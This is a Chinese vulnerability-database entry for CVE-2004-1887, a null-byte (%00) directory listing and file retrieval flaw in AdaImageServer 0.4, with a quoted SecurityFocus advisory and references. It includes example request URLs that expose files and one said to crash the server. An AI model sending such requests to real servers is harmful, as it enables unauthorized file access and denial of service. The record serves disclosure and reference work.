ADA IMGSVR远程目录列表漏洞

ADA IMGSVR远程目录列表漏洞

漏洞ID 1107842 漏洞类型 输入验证
发布时间 2004-04-01 更新时间 2005-10-20
图片[1]-ADA IMGSVR远程目录列表漏洞-安全小百科CVE编号 CVE-2004-1887
图片[2]-ADA IMGSVR远程目录列表漏洞-安全小百科CNNVD-ID CNNVD-200412-434
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/23906
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-434
|漏洞详情
AdaImageServer(ImgSvr)0.4版本中存在漏洞。攻击者可以借助带有拖尾%00(空)的HTTP请求查看目录或者下载文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/10027/info

A vulnerability has been reported in the ImgSvr server software that may allow a remote user to the retrieve arbitrary files from the web server root directory and any subdirectories therein.

An attacker may leverage this issue to gain access to arbitrary scripts contained within the server root directory. 

http://www.example.org:1234/someDirectory/fileName%00

The following has been reported to crash the affected server:
http://127.0.0.1:1234/%00/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/
|参考资料

来源:SECUNIA
名称:11277
链接:http://secunia.com/advisories/11277
来源:XF
名称:imgsvr-obtain-information(15706)
链接:http://xforce.iss.net/xforce/xfdb/15706
来源:BID
名称:10027
链接:http://www.securityfocus.com/bid/10027
来源:BID
名称:10026
链接:http://www.securityfocus.com/bid/10026
来源:www.autistici.org
链接:http://www.autistici.org/fdonato/advisory/imgSvr0.4-adv.txt
来源:sourceforge.net
链接:http://sourceforge.net/project/shownotes.php?release_id=230023
来源:BUGTRAQ
名称:20040401IndexviewinginimgSvr0.4
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108083813528255&w;=2

相关推荐: Stockman Shopping Cart Arbitrary Command Execution Vulnerability

Stockman Shopping Cart Arbitrary Command Execution Vulnerability 漏洞ID 1100325 漏洞类型 Input Validation Error 发布时间 2003-05-01 更新时间 200…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享